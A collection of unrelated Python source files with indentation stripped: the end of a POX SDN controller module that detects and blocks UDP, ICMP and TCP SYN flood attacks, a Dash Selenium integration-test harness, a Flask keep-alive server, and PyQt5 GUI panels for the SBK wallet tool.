elif classifier.loc[17] > mod.THRESHOLD_UDP:
change_mode = mod.MODE_DETECT_UDP
print "Suspect UDP attack - change controller to mode detect UDP attack"
elif classifier.loc[6] > mod.THRESHOLD_TCP_SYN:
change_mode = mod.MODE_DETECT_TCPSYN
print "Suspect TCP SYN attack - change controller to mode detect TCP SYN attack"
else:
change_mode = mod.MODE_NORMAL
print "Not detect attack - change controller to mode normal"
# mode detect udp attack
elif change_mode==mod.MODE_DETECT_UDP:
print "detect UDP attack using KNN"
ent_tp_src = calculate_Entropy(new_flows.groupby(['port_src'])['total_pkt'].sum())
ent_tp_dst = calculate_Entropy(new_flows.groupby(['port_dst'])['total_pkt'].sum())
ent_packet_type = calculate_Entropy(new_flows.groupby(['proto'])['total_pkt'].sum())
feature_vector = pd.Series([ent_ip_src, ent_tp_src, ent_tp_dst, ent_packet_type, total_packets],
index=['ent_ip_src',
'ent_tp_src',
'ent_tp_dst',
'ent_packet_type',
'total_packets'])
print "Feature list \n ", feature_vector
normalize(feature_vector)
tobeClassifed = feature_vector.values
change_mode = knn.calculate(tobeClassifed)
if change_mode == 1:
change_mode += 2
print " UDP Attack!!!\n UDP Attack!!!\n UDP Attack!!!"
else:
print "Relax... It's a mistake"
# detect ICMP attack using deep learning
elif change_mode==mod.MODE_DETECT_ICMP:
print "Detect ICMP attack using deep learning"
ent_tp_src = calculate_Entropy(new_flows.groupby(['port_src'])['total_pkt'].sum())
ent_tp_dst = calculate_Entropy(new_flows.groupby(['port_dst'])['total_pkt'].sum())
ent_packet_type = calculate_Entropy(new_flows.groupby(['proto'])['total_pkt'].sum())
feature_vector = pd.Series([ent_ip_src, ent_tp_src, ent_tp_dst, ent_packet_type, total_packets],
index=['ent_ip_src',
'ent_tp_src',
'ent_tp_dst',
'ent_packet_type',
'total_packets'])
print "Feature list \n ", feature_vector
normalize_icmp(feature_vector)
tobeClassifed = np.reshape(feature_vector.values, (-1,1))
change_mode = Backprop.predict_realtime(tobeClassifed, parameters)
if change_mode == 1:
change_mode += 1
msg = of.ofp_flow_mod()
msg.priority = mod.PRIORITY
msg.match.dl_type = 0x800
msg.match.nw_proto = 1
for connection in core.openflow.connections:
connection.send(msg)
print " ICMP Attack!!!\n ICMP Attack!!!\n ICMP Attack!!!"
else:
print "Relax... it's a mistake"
# print "df1: ", df1
# print "df2: ", df2
df1 = df2.copy()
n12 = t.time() ################ n12-n1 = total time ##############
req2rep = n12 - n1
print('From Request to Reply =', req2rep)
def _tcp_status(event):
global packets, ip, count, change_mode
if tcp_activation:
global packets, start
table = []
packet = event.parsed
# tcp = packet.find('tcp')
if packet.find('tcp') and packet.find('tcp').SYN and packet.find('tcp').ACK == False:
table.append([of.ofp_match.from_packet(packet).tp_src,
# of.ofp_match.from_packet(packet).tp_dst,
of.ofp_match.from_packet(packet).nw_src,
# of.ofp_match.from_packet(packet).nw_dst
])
if len(packets) == 0:
packets = pd.DataFrame(table,
columns=['source_port','IP_source'])
else:
new_packets = pd.DataFrame(table,
columns=['source_port', 'IP_source',])
packets = packets.append(new_packets, ignore_index=True)
ip = pd.read_csv('test.csv')
# ip_update = ip['IP_source'].as_matrix()
# if str(of.ofp_match.from_packet(packet).nw_src) in ip_update:
# packet_out = of.ofp_packet_out()
# # flow_mod = of.ofp_flow_mod()
# packet_out.buffer_id = event.ofp.buffer_id
# packet_out.match = of.ofp_match.from_packet(packet)
# # packet_out.data = event.data
# # packet_out.in_port = event.port
# event.connection.send(packet_out)
# elif count > 2:
# change_mode = 0
if t.time() - start >= y5:
count += 1
# print len(ip)
start = t.time()
thread1 = threading.Thread(target=processing_statistic, args=(packets,))
thread1.start()
packets = pd.DataFrame([])
def processing_statistic(pk):
global statistic, change_mode, tcp_activation, count
global ip
if len(pk) != 0:
statistic = pk
# print(statistic)
statistic['destination_port'] = 1
new_statistic = statistic.groupby(['IP_source', 'source_port']).count()
new_statistic_2 = statistic.drop(['source_port'], axis=1).groupby(['IP_source']).count()
# print new_statistic_2
new_statistic = new_statistic/new_statistic_2
new_statistic = -new_statistic*np.log2(new_statistic)
new_statistic = new_statistic.groupby(['IP_source']).sum()
# #### using algorithm
# # print new_statistic
# tobeClassifier = new_statistic.as_matrix()
# # print tobeClassifier.shape
# labels = tcp_syn.calculate_batch(tobeClassifier)
# labels = np.array(labels)
# print labels
# change_mode = np.max(labels)*4
#### Not using algorithm
new_statistic = new_statistic.iloc[new_statistic['destination_port'].as_matrix() > 5, :]
change_mode = int(len(new_statistic) != 0)*4
print "change_mode=", change_mode
if change_mode == mod.MODE_NORMAL and count > 2:
tcp_activation = 0
count = 0
else:
print "TCP-SYN attack!!!\nTCP-SYN attack!!!\nTCP-SYN attack!!!"
# new_statistic = new_statistic.iloc[labels == 1, :]
# count = 0
if len(ip) != 0 and len(new_statistic) != 0:
# ip.set_index('IP_source', inplace=True)
# new_statistic['IP_source'] = new_statistic['IP_source'].astype(str)
new_statistic.index = new_statistic.index.astype(str)
new_statistic = new_statistic.loc[new_statistic.index.difference(ip.index), ]
for ip_src in new_statistic.index:
msg = of.ofp_flow_mod()
msg.priority = mod.PRIORITY
msg.match.dl_type = 0x800
msg.match.nw_src = IPAddr(ip_src)
for connection in core.openflow.connections:
connection.send(msg)
with open('test.csv', 'a') as f:
new_statistic.to_csv(f, encoding='utf-8', header=False)
print "=================================================="
# main functiont to launch the module
def launch ():
from pox.lib.recoco import Timer
global start, cnt, mean, std, max_feature, min_feature, max_feature_icmp, min_feature_icmp
global change_mode, tcp_activation
tcp_activation = 0
change_mode = 0
cnt=0
start = t.time()
# mean = pd.read_pickle("./somInput/meanStats")
# std = pd.read_pickle("./somInput/stdStats")
mean = pd.read_pickle("./somInput/maxFeature")
std = pd.read_pickle("./somInput/minFeature")
max_feature = pd.read_pickle("./somInput/max_feature.pickle")
min_feature = pd.read_pickle("./somInput/min_pickle.pickle")
max_feature_icmp = pd.read_pickle("./somInput/max_feature_icmp")
min_feature_icmp = pd.read_pickle("./somInput/min_feature_icmp")
print 'start=', start
# attach handsers to listners
core.openflow.addListenerByName("FlowStatsReceived",
_handle_flowstats_received)
core.openflow.addListenerByName("PacketIn",
_tcp_status)
# timer set to execute every five seconds
Timer(5, _timer_func, recurring=True)
|
IntegrationTests.py
|
from __future__ import absolute_import
import logging
import os
import multiprocessing
import sys
import time
import unittest
import percy
import threading
import platform
import flask
import requests
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
class IntegrationTests(unittest.TestCase):
def percy_snapshot(self, name=''):
if os.environ.get('PERCY_ENABLED', False):
snapshot_name = '{} - {}'.format(name, sys.version_info)
self.percy_runner.snapshot(
name=snapshot_name
)
@classmethod
def setUpClass(cls):
super(IntegrationTests, cls).setUpClass()
options = Options()
if 'DASH_TEST_CHROMEPATH' in os.environ:
options.binary_location = os.environ['DASH_TEST_CHROMEPATH']
cls.driver = webdriver.Chrome(chrome_options=options)
if os.environ.get('PERCY_ENABLED', False):
loader = percy.ResourceLoader(
webdriver=cls.driver
)
cls.percy_runner = percy.Runner(loader=loader)
cls.percy_runner.initialize_build()
@classmethod
def tearDownClass(cls):
super(IntegrationTests, cls).tearDownClass()
cls.driver.quit()
if os.environ.get('PERCY_ENABLED', False):
cls.percy_runner.finalize_build()
def setUp(self):
pass
def tearDown(self):
time.sleep(3)
if platform.system() == 'Windows':
requests.get('http://localhost:8050/stop')
else:
self.server_process.terminate()
time.sleep(3)
def startServer(self, app):
if 'DASH_TEST_PROCESSES' in os.environ:
processes = int(os.environ['DASH_TEST_PROCESSES'])
else:
processes = 4
def run():
app.scripts.config.serve_locally = True
app.css.config.serve_locally = True
app.run_server(
port=8050,
debug=False,
processes=processes
)
def run_windows():
app.scripts.config.serve_locally = True
app.css.config.serve_locally = True
@app.server.route('/stop')
def _stop_server_windows():
stopper = flask.request.environ['werkzeug.server.shutdown']
stopper()
return 'stop'
app.run_server(
port=8050,
debug=False,
threaded=True
)
# Run on a separate process so that it doesn't block
system = platform.system()
if system == 'Windows':
self.server_thread = threading.Thread(target=run_windows)
self.server_thread.start()
else:
self.server_process = multiprocessing.Process(target=run)
self.server_process.start()
logging.getLogger('werkzeug').setLevel(logging.ERROR)
time.sleep(5)
# Visit the dash page
self.driver.get('http://localhost:8050')
time.sleep(0.5)
|
keep_alive.py
|
from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def home():
return "Hello. I am alive!"
def run():
app.run(host='0.0.0.0',port=8080)
def keep_alive():
t = Thread(target=run)
t.start()
|
gui_panels.py
|
#!/usr/bin/env python3
# This file is part of the SBK project
# https://github.com/mbarkhau/sbk
#
# Copyright (c) 2019-2021 Manuel Barkhau (mbarkhau@gmail.com) - MIT License
# SPDX-License-Identifier: MIT
# messy ui code is messy ...
# pylint: disable=too-many-instance-attributes
# pylint: disable=too-many-return-statements
"""GUI Panels for SBK."""
import os
import time
import logging
import pathlib as pl
import tempfile
import threading
import subprocess as sp
from typing import Any
from typing import Set
from typing import Dict
from typing import List
from typing import Type
from typing import Tuple
from typing import Union
from typing import Generic
from typing import NewType
from typing import TypeVar
from typing import Callable
from typing import Iterable
from typing import Iterator
from typing import Optional
from typing import Protocol
from typing import Sequence
from typing import Generator
from typing import NamedTuple
import PyQt5.QtGui as qtg
import PyQt5.QtCore as qtc
import PyQt5.QtWidgets as qtw
from . import __version__
from . import shamir
from . import gui_tasks as gt
from . import ui_common
from . import parameters
from . import common_types as ct
from . import package_data
from . import gui_panels_base as gpb
logger = logging.getLogger("sbk.gui_panels")
GUIDE_TEXT = f"""
<html><head/><body style="white-space:pre-wrap;">
<p style="font-family:monospace;font-size:12px;line-height:92%;">
{ui_common.USER_GUIDE_QR_CODE}<p>
<center>{ui_common.USER_GUIDE_TEXT.strip()}</center>
</body></html>
"""
WARNING_TEXT = f"""
<html><head/><body style="white-space:pre-wrap;">
<p>
{ui_common.SECURITY_WARNING_TEXT.strip()}
</p>
<p style="font-family:monospace;line-height:100%;">
{ui_common.SECURITY_WARNING_QR_CODE}
<p>
</body></html>
"""
class SelectCommandPanel(gpb.Panel):
buttons: Dict[str, qtw.QPushButton]
def __init__(self, index: int):
self.title = "SBK"
super().__init__(index)
self._layout = qtw.QVBoxLayout()
pixmap = qtg.QPixmap()
pixmap.loadFromData(package_data.read_binary("nostroke_logo_64.png"))
icon_label = qtw.QLabel(self)
icon_label.setPixmap(pixmap.scaledToWidth(64))
icon_label.setAlignment(qtc.Qt.AlignCenter)
self._layout.addStretch(1)
self._layout.addWidget(icon_label)
self._layout.addStretch(1)
self.buttons = {}
def add_button(label: str, button_id: str, *, enabled: bool = True) -> qtw.QPushButton:
button = qtw.QPushButton(label)
button.clicked.connect(self.init_button_handler(button_id))
button.setEnabled(enabled)
self.buttons[button_id] = button
self._layout.addWidget(button)
return button
add_button("&Create Wallet" , 'generate').setDefault(True)
add_button("&Open Wallet" , 'open')
add_button("&Recover from Shares", 'recover')
self._layout.addStretch(1)
# add_button("&Load Salt and Brainkey", 'load')
# add_button("Derive &GPG Keypair", 'derive_gpg', enabled=False)
# add_button("Derive Password", 'derive_password', enabled=False)
# self._layout.addStretch(1)
add_button("&Settings" , 'settings')
add_button("&User Guide", 'userguide')
# self._layout.addStretch(1)
# add_button("&Debug", 'debug', enabled=False)
self._layout.addStretch(2)
version_text = f"""
<p style="font-family:monospace;font-size:10px;">
version: {__version__}
</a>
"""
version_label = qtw.QLabel(version_text)
version_label.setAlignment(qtc.Qt.AlignRight)
self._layout.addStretch(1)
self._layout.addWidget(version_label)
self.setLayout(self._layout)
def switch(self) -> None:
state = gpb.get_state()
self.trace("switch " + str((state['salt'], state['brainkey'], state['params'])))
state['panel_index'] = 0
# if state['salt'] and state['brainkey'] and state['params']:
# self.buttons['derive_gpg'].setEnabled(True)
# self.buttons['derive_pw'].setEnabled(True)
# self.buttons['show'].setEnabled(True)
# else:
# self.buttons['derive_gpg'].setEnabled(False)
# self.buttons['derive_pw'].setEnabled(False)
# self.buttons['show'].setEnabled(False)
super().switch()
def init_button_handler(self, button_id: str) -> Callable:
def handler(*args, **kwargs):
self.trace(f"handle button {button_id=} {args} {kwargs}")
p = self.parent()
if button_id in ('generate', 'open', 'load', 'recover'):
state = gpb.get_state()
state['salt' ] = None
state['brainkey'] = None
state['shares' ] = []
# state['params' ] = None
if button_id == 'open':
p.get_or_init_panel(OpenWalletPanel).switch()
elif button_id == 'recover':
p.get_or_init_panel(RecoverKeysPanel).switch()
elif button_id == 'generate':
p.get_or_init_panel(SeedGenerationPanel).switch()
# elif button_id == 'load':
# p.get_or_init_panel(XLoadKeysPanel).switch()
# elif button_id == 'show':
# p.get_or_init_panel(ShowKeysPanel).switch()
elif button_id == 'settings':
p.get_or_init_panel(SettingsPanel).switch()
elif button_id == 'userguide':
p.get_or_init_panel(UserGuidePanel).switch()
# elif button_id == 'debug':
# params = parameters.bytes2params(b"\x11\x00\x00")
# state = gpb.get_state()
# state['params'] = params
# p.get_or_init_panel(ShowKeysPanel).switch()
else:
raise NotImplementedError()
return handler
class SettingsPanel(gpb.NavigablePanel):
def __init__(self, index: int):
self.title = "SBK - Settings"
self.back_panel_clazz = SelectCommandPanel
self.next_panel_clazz = SelectCommandPanel
super().__init__(index)
self.next_button.setText("&Save")
form = qtw.QFormLayout()
state = gpb.get_state()
self.offline = qtw.QCheckBox()
self.offline.setTristate(False)
form.addRow("&Offline", self.offline)
# NOTE (mb 2021-09-24): Reserve wallet name function to cli
# for now. It might be added to the gui later if we can
# communicae the usage caveats to the user.
#
# self.wallet_name = qtw.QLineEdit()
# if state['wallet_name'] == ui_common.DEFAULT_WALLET_NAME:
# self.wallet_name.setPlaceholderText(ui_common.DEFAULT_WALLET_NAME)
# else:
# self.wallet_name.setText(state['wallet_name'])
# form.addRow("&Wallet Name", self.wallet_name)
self.sss_t = qtw.QSpinBox()
self.sss_t.setRange(parameters.MIN_THRESHOLD, parameters.MAX_THRESHOLD)
form.addRow("&Threshold", self.sss_t)
self.sss_n = qtw.QSpinBox()
self.sss_n.setRange(3, 63)
form.addRow("Shares", self.sss_n)
def constrain_threshold():
threshold = min(self.sss_n.value(), parameters.MAX_THRESHOLD)
self.sss_t.setMaximum(threshold)
def constrain_num_shares():
self.sss_n.setMinimum(self.sss_t.value())
self.sss_n.valueChanged.connect(constrain_threshold)
self.sss_t.valueChanged.connect(constrain_num_shares)
self.target_memory = qtw.QSpinBox()
self.target_memory.setRange(10, state['max_memory'])
self.target_memory.setSingleStep(10)
form.addRow("&Memory Usage [MB]", self.target_memory)
self.target_duration = qtw.QSpinBox()
self.target_duration.setRange(1, 600)
form.addRow("&Duration [Seconds]", self.target_duration)
self._layout = qtw.QVBoxLayout()
self._layout.addLayout(form)
self._layout.addStretch(1)
self._layout.addLayout(self.nav_layout)
self.setLayout(self._layout)
def switch(self) -> None:
super().switch()
state = gpb.get_state()
params = state['params']
assert params is not None
self.offline.setCheckState(qtc.Qt.Checked if state['offline'] else qtc.Qt.Unchecked)
self.sss_t.setValue(params.sss_t)
self.sss_n.setValue(params.sss_n)
self.target_memory.setValue(state['target_memory'])
self.target_duration.setValue(state['target_duration'])
def nav_handler(self, eventtype: str) -> Callable:
super_handler = super().nav_handler(eventtype)
def handler() -> None:
if eventtype == 'next':
state = gpb.shared_panel_state
state['offline'] = self.offline.checkState() == qtc.Qt.Checked
params = state['params']
assert params is not None
params = params._replace(sss_t=self.sss_t.value())
params = params._replace(sss_n=self.sss_n.value())
state['params'] = params
target_memory = self.target_memory.value()
state['target_memory' ] = target_memory
state['target_duration'] = self.target_duration.value()
super_handler()
return handler
class SeedGenerationPanel(gpb.Panel):
task1: Optional[gt.ParametersWorker]
task2: Optional[gt.SeedGenerationTask]
def __init__(self, index: int):
self.title = "Key Derivation ..."
super().__init__(index)
self._layout = qtw.QVBoxLayout()
label1 = qtw.QLabel("KDF Calibration")
label2 = qtw.QLabel("Key Derivation")
self.progressbar1 = qtw.QProgressBar()
self.progressbar1.setRange(0, 5000)
self.progressbar1.setValue(0)
self.progressbar2 = qtw.QProgressBar()
self.progressbar2.setRange(0, 90000)
self.progressbar2.setValue(0)
# Instantiated in switch(), because we want fresh parameters
# from previous panel every time.
self.task1 = None
self.task2 = None
self._layout.addWidget(label1)
self._layout.addWidget(self.progressbar1)
self._layout.addWidget(label2)
self._layout.addWidget(self.progressbar2)
self._layout.addStretch(1)
self.setLayout(self._layout)
def switch(self) -> None:
self.progressbar1.setValue(0)
self.progressbar2.setValue(0)
state = gpb.get_state()
params = state['params']
assert params is not None
self.task1 = gt.ParametersWorker(
state['target_memory'],
state['target_duration'],
params.sss_t,
params.sss_n,
)
self.task1.progress.connect(progressbar_updater(self.progressbar1))
self.task1.finished.connect(self.on_param_config_done)
super().switch()
self.task1.start()
def on_param_config_done(self, params: parameters.Parameters) -> None:
self.trace("on_param_config_done")
state = gpb.get_state()
state['params'] = params
self.task2 = gt.SeedGenerationTask(params)
self.task2.progress.connect(progressbar_updater(self.progressbar2))
self.task2.finished.connect(self.on_seed_generation_done)
self.task2.start()
def on_seed_generation_done(self, status: str) -> None:
if status == 'ok':
self.trace("on_seed_generation_done")
self.parent().get_or_init_panel(SecurityWarningPanel).switch()
else:
qtw.QMessageBox.critical(self, 'Error', status)
self.parent().close()
class UserGuidePanel(gpb.NavigablePanel):
def __init__(self, index: int):
self.title = "User Guide"
self.back_panel_clazz = SelectCommandPanel
self.next_panel_clazz = SelectCommandPanel
super().__init__(index)
label = qtw.QLabel(GUIDE_TEXT.strip())
label_wrap = qtw.QHBoxLayout()
label_wrap.addStretch(1)
label_wrap.addWidget(label)
label_wrap.addStretch(1)
self._layout = qtw.QVBoxLayout()
self._layout.addLayout(label_wrap)
self._layout.addStretch(2)
self._layout.addWidget(self.new_pdf_button("Share A4", "share_a4.pdf"))
self._layout.addWidget(self.new_pdf_button("Guide A4", "sbk_a4.pdf"))
self._layout.addWidget(self.new_pdf_button("Guide A4 Booklet", "sbk_booklet_letter.pdf"))
# self._layout.addWidget(self.new_pdf_button("Grid A4", "grid_a4.pdf"))
self._layout.addWidget(self.new_pdf_button("Share US Letter", "share_letter.pdf"))
self._layout.addWidget(self.new_pdf_button("Guide US Letter", "sbk_letter.pdf"))
self._layout.addWidget(self.new_pdf_button("Guide US Letter Booklet", "sbk_booklet_letter.pdf"))
# self._layout.addWidget(self.new_pdf_button("Grid US Letter", "grid_letter.pdf"))
self._layout.addStretch(1)
self._layout.addLayout(self.nav_layout)
self.setLayout(self._layout)
# self.next_button.setEnabled(False)
self.next_button.setVisible(False)
def new_pdf_button(self, label: str, pdf_name: str) -> qtw.QPushButton:
button = qtw.QPushButton(label)
button.clicked.connect(self.init_button_handler(pdf_name))
return button
def init_button_handler(self, pdf_name: str) -> Callable:
def launch():
pdf_data = package_data.read_binary(pdf_name)
tmp_path = tempfile.NamedTemporaryFile(suffix=".pdf", delete=False)
tmp_path.write(pdf_data)
tmp_path.close()
sp.run(["evince", tmp_path.name])
os.unlink(tmp_path.name)
def handler(*args, **kwargs):
launcher_thread = threading.Thread(target=launch, daemon=False)
launcher_thread.start()
return handler
class SecurityWarningPanel(gpb.NavigablePanel):
def __init__(self, index: int):
self.title = "Create New Wallet"
self.back_panel_clazz = SelectCommandPanel
self.next_panel_clazz = CreateKeysShowPanel
super().__init__(index)
label = qtw.QLabel(WARNING_TEXT.strip())
label_wrap = qtw.QHBoxLayout()
label_wrap.addStretch(1)
label_wrap.addWidget(label)
label_wrap.addStretch(1)
self._layout = qtw.QVBoxLayout()
self._layout.addLayout(label_wrap)
self._layout.addStretch(2)
self._layout.addLayout(self.nav_layout)
self.setLayout(self._layout)
def get_label_text() -> str:
secret_type, share_idx = gpb.get_secret_type()
if secret_type == 'share':
share_no = share_idx + 1
sss_n = len(gpb.shared_panel_state['shares'])
return f"Share {share_no}/{sss_n}"
elif secret_type == 'salt':
return "Salt"
elif secret_type == 'brainkey':
return "Brainkey"
else:
raise ValueError(f"Invalid secret_type={secret_type}")
class ShowKeysPanel(gpb.NavigablePanel):
def __init__(self, index: int):
self.title = "View Keys"
super().__init__(index)
self.header = gpb.header_widget()
self.text = qtw.QLabel()
self.grid_widgets: List[qtw.QWidget] = []
self.grid_layout = qtw.QGridLayout()
self._layout = qtw.QVBoxLayout()
self._layout.addWidget(self.header)
self._layout.addLayout(gpb.column_headers(self))
self._layout.addLayout(self.grid_layout)
self._layout.addStretch(1)
self._layout.addLayout(self.nav_layout)
self.setLayout(self._layout)
def get_current_secret(self) -> gpb.CurrentSecret:
return gpb.get_current_secret()
def switch(self) -> None:
self.trace(f"switch {type(self).__name__} {gpb.shared_panel_state['panel_index']}")
self.header.setText(get_label_text())
secret = self.get_current_secret()
intcodes = ui_common.bytes2intcodes(secret.secret_data)
mnemonics = ui_common.intcodes2mnemonics(intcodes)
num_rows = len(intcodes) // 2
assert num_rows * 2 == len(intcodes)
lr_intcodes = list(sum(zip(intcodes[:num_rows], intcodes[num_rows:]), ()))
_lr_intcodes = iter(lr_intcodes)
_mnemonics = iter(mnemonics)
all_row_widgets: gpb.RowWidgets = []
while True:
try:
row_widgets = (
gpb._label_widget(self, next(_lr_intcodes), bold=True),
gpb._label_widget(self, next(_mnemonics ), bold=True),
gpb._label_widget(self, next(_mnemonics ), bold=True),
gpb._label_widget(self, next(_lr_intcodes), bold=True),
)
all_row_widgets.append(row_widgets)
except StopIteration:
break
new_widgets = gpb.init_grid(self, self.grid_layout, all_row_widgets)
self.grid_widgets.extend(new_widgets)
super().switch()
@property
def back_panel_clazz(self) -> Type[gpb.Panel]:
state = gpb.shared_panel_state
self.trace(f"back show {state['panel_index']}")
if state['panel_index'] == 0:
return SelectCommandPanel
else:
state['panel_index'] -= 1
return ShowKeysPanel
@property
def next_panel_clazz(self) -> Type[gpb.Panel]:
state = gpb.shared_panel_state
self.trace(f"next show {state['panel_index']}")
if state['panel_index'] + 1 < len(state['shares']) + 2:
state['panel_index'] += 1
return ShowKeysPanel
else:
return SelectCommandPanel
def destroy_panel(self) -> None:
for widget in self.grid_widgets:
self.grid_layout.removeWidget(widget)
widget.deleteLater()
del self.grid_widgets[:]
super().destroy_panel()
class CreateKeysShowPanel(ShowKeysPanel):
def __init__(self, index: int):
self.title = "Create New Wallet"
super().__init__(index)
@property
def back_panel_clazz(self) -> Type[gpb.Panel]:
self.trace(f"back show {gpb.shared_panel_state['panel_index']}")
if gpb.shared_panel_state['panel_index'] == 0:
return SecurityWarningPanel
else:
gpb.shared_panel_state['panel_index'] = max(gpb.shared_panel_state['panel_index'] - 1, 0)
return CreateKeysVerifyPanel
@property
def next_panel_clazz(self) -> Type[gpb.Panel]:
self.trace(f"next show {gpb.shared_panel_state['panel_index']}")
return CreateKeysVerifyPanel
MaybeBytes = Union[bytes, None]
class CreateKeysVerifyPanel(gpb.EnterSecretPanel):
def __init__(self, index: int):
self.title = "Create New Wallet"
super().__init__(index)
def label_text(self) -> str:
return "Verify " + get_label_text()
def secret_len(self) -> int:
current_secret = gpb.get_current_secret()
return len(current_secret.secret_data)
@property
def back_panel_clazz(self) -> Type[gpb.Panel]:
return CreateKeysShowPanel
@property
def next_panel_clazz(self) -> Type[gpb.Panel]:
state = gpb.shared_panel_state
num_shares = len(state['shares'])
num_secrets = num_shares + 2
if state['panel_index'] + 1 < num_secrets:
state['panel_index'] = max(state['panel_index'] + 1, 0)
return CreateKeysShowPanel
else:
return LoadWalletPanel
def is_final_panel(self) -> bool:
state = gpb.shared_panel_state
num_shares = len(state['shares'])
num_secrets = num_shares + 2
return state['panel_index'] + 1 >= num_secrets
class OpenWalletPanel(gpb.EnterSecretPanel):
def __init__(self, index: int):
self.title = "Load Wallet"
super().__init__(index)
def label_text(self) -> str:
if gpb.shared_panel_state['panel_index'] == 0:
return "Enter Salt"
else:
return "Enter Brainkey"
def secret_len(self) -> int:
lens = parameters.raw_secret_lens()
if gpb.shared_panel_state['panel_index'] == 0:
return lens.salt
else:
return lens.brainkey
@property
def back_panel_clazz(self) -> Type[gpb.Panel]:
state = gpb.shared_panel_state
if state['panel_index'] == 0:
return SelectCommandPanel
else:
state['panel_index'] = max(state['panel_index'] - 1, 0)
return OpenWalletPanel
@property
def next_panel_clazz(self) -> Type[gpb.Panel]:
state = gpb.shared_panel_state
if state['panel_index'] == 0:
state['panel_index'] = max(state['panel_index'] + 1, 0)
return OpenWalletPanel
else:
return LoadWalletPanel
def destroy_panel(self) -> None:
state = gpb.shared_panel_state
recovered_datas = self.recover_datas()
if all(recovered_datas):
recovered_data = b"".join(recovered_datas) # type: ignore
params = gpb.get_params()
lens = parameters.raw_secret_lens()
if state['panel_index'] == 0:
assert len(recovered_data) == lens.salt
header = recovered_data[: parameters.SALT_HEADER_LEN]
state['params'] = parameters.bytes2params(header)
state['salt' ] = ct.Salt(recovered_data)
else:
assert len(recovered_data) == lens.brainkey
state['brainkey'] = ct.BrainKey(recovered_data)
params = state['params']
salt = state['salt']
brainkey = state['brainkey']
if params and salt and brainkey:
raw_salt = ct.RawSalt(bytes(salt)[parameters.SALT_HEADER_LEN :])
shares = shamir.split(params, raw_salt, brainkey)
state['shares'] = shares
super().destroy_panel()
class LoadWalletPanel(gpb.Panel):
task: Optional[gt.SeedDerivationTask]
def __init__(self, index: int):
self.title = "Key Derivation ..."
super().__init__(index)
self._layout = qtw.QVBoxLayout()
label = qtw.QLabel("KDF Derivation")
self.progressbar = qtw.QProgressBar()
self.progressbar.setRange(0, 5000)
self.progressbar.setValue(0)
# Instantiated in switch(), because we want fresh parameters
# from previous panel every time.
self.task = None
self._layout.addWidget(label)
self._layout.addWidget(self.progressbar)
self._layout.addStretch(1)
self.setLayout(self._layout)
def switch(self) -> None:
self.trace("switch")
state = gpb.get_state()
seed_data = state['seed_data']
params = state['params']
assert params is not None
if seed_data is None:
salt = state['salt']
brainkey = state['brainkey']
assert salt is not None
assert brainkey is not None
self.task = gt.SeedDerivationTask(params, salt, brainkey)
self.task.progress.connect(progressbar_updater(self.progressbar))
self.task.finished.connect(self.on_key_dervation_done)
super().switch()
self.trace("start derivation")
self.task.start()
else:
# seed_data freshly generated
load_wallet()
self.parent().close()
return
def on_key_dervation_done(self, status: str) -> None:
if status == 'ok':
self.trace("OpenWalletPanel.on_key_dervation_done")
load_wallet()
self.parent().close()
else:
qtw.QMessageBox.critical(self, 'Error', status)
self.parent().close()
def is_final_panel(self) -> bool:
# pylint: disable=no-self-use # override for ABC
return True
def progressbar_updater(progressbar: qtw.QProgressBar) -> Callable[[gt.ProgressStatus], None]:
def update_progressbar(status: gt.ProgressStatus) -> None:
try:
progressbar.setRange(0, status.length)
progressbar.setValue(round(status.current))
except RuntimeError:
pass
return update_progressbar
def load_wallet() -> None:
def launch():
seed_data = gpb.shared_panel_state['seed_data']
offline = gpb.shared_panel_state['offline']
assert seed_data is not None
ui_common.load_wallet(seed_data, offline)
launcher_thread = threading.Thread(target=launch, daemon=False)
launcher_thread.start()
# Delay closing the panel while the wallet loads
# this is a bit less jarring.
electrum_daemon_path = pl.Path("~").expanduser() / ".electrum" / "daemon"
wait_start = time.time()
while True:
if os.path.exists(electrum_daemon_path):
time.sleep(0.5)
return
if time.time() - wait_start > 5:
return
time.sleep(0.1)
class RecoverKeysPanel(gpb.EnterSecretPanel):
def __init__(self, index: int):
self.title = "Recover Wallet"
super().__init__(index)
def label_text(self) -> str:
params = gpb.get_params()
if params is None:
num_shares = -1
else:
num_shares = params.sss_n
panel_index = gpb.shared_panel_state['panel_index']
share_no = panel_index + 1
if num_shares == -1:
return f"Enter Share {share_no}/N"
else:
return f"Enter Share {share_no}/{num_shares}"
def secret_len(self) -> int:
lens = parameters.raw_secret_lens()
return lens.share
def destroy_panel(self) -> None:
recovered_datas = self.recover_datas()
if all(recovered_datas):
share_data = ct.Share(b"".join(recovered_datas)) # type: ignore
shares = gpb.shared_panel_state['shares']
gpb.shared_panel_state['shares'] = list(shares) + [share_data]
super().destroy_panel()
@property
def back_panel_clazz(self) -> Type[gpb.Panel]:
panel_index = gpb.shared_panel_state['panel_index']
if panel_index == 0:
return SelectCommandPanel
else:
gpb.shared_panel_state['panel_index'] = max(panel_index - 1, 0)
return RecoverKeysPanel
@property
def next_panel_clazz(self) -> Type[gpb.Panel]:
state = gpb.shared_panel_state
panel_index = state['panel_index']
if panel_index == 0:
state['panel_index'] = panel_index + 1
return RecoverKeysPanel
else:
params = gpb.get_params()
# we should only reach here if a valid share was entered previously
assert params is not None
if len(state['shares']) < params.sss_n:
state['panel_index'] = panel_index + 1
return RecoverKeysPanel
else:
state['panel_index'] = 0
raw_salt, brainkey = shamir.join(state['shares'])
# recompute shares, because user only enters as many as needed
shares = shamir.split(params, raw_salt, brainkey)
params_data = parameters.params2bytes(params)
salt = ct.Salt(params_data[:2] + raw_salt)
state['salt' ] = salt
state['brainkey'] = brainkey
state['shares' ] = shares
return RecoverKeysShowPanel
def is_final_panel(self) -> bool:
params = gpb.get_params()
assert params is not None
return len(gpb.shared_panel_state['shares']) >= params.sss_n
class RecoverKeysShowPanel(ShowKeysPanel):
def __init__(self, index: int):
self.title = "Recover Keys"
super().__init__(index)
def label_text(self) -> str:
panel_index = gpb.shared_panel_state['panel_index']
if panel_index == 0:
return "Recovered Salt"
elif panel_index == 1:
return "Recovered Brainkey"
else:
raise ValueError(f"Invalid state {panel_index:=}")
def get_current_secret(self) -> gpb.CurrentSecret:
panel_index = gpb.shared_panel_state['panel_index']
if panel_index == 0:
return gpb.get_secret('salt')
elif panel_index == 1:
return gpb.get_secret('brainkey')
else:
raise RuntimeError(f"Invalid {panel_index:=}")
@property
def back_panel_clazz(self) -> Type[gpb.Panel]:
self.trace(f"back show {gpb.shared_panel_state['panel_index']}")
if gpb.shared_panel_state['panel_index'] == 0:
